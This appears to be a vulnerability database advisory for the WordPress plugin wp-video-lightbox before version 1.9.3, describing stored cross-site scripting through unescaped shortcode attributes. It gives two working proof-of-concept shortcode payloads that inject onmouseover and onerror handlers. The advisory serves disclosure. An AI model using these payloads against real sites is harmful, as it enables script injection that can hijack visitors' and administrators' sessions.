The plugin does not escape the attributes of its shortcodes, allowing users with a role as low as contributor to perform Cross-Site Scripting attacks
[video_lightbox_vimeo5 video_id=‘“onmouseover=alert(/XSS/) b=”’ width=“640” height=“480” anchor=“Click here to open vimeo video”] [video_lightbox_vimeo5 video_id=“13562192” width=“640” height=“480” anchor=‘http"onerror=alert(/XSS/)//’]
CPE | Name | Operator | Version |
---|---|---|---|
wp-video-lightbox | lt | 1.9.3 |